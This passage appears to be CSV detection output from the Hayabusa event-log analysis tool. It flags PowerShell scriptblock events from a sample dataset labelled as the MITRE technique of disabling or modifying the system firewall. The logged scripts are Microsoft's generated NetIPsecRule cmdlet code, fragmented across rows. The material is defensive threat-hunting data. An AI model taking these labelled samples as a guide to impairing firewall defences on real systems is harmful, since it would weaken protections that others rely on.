${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 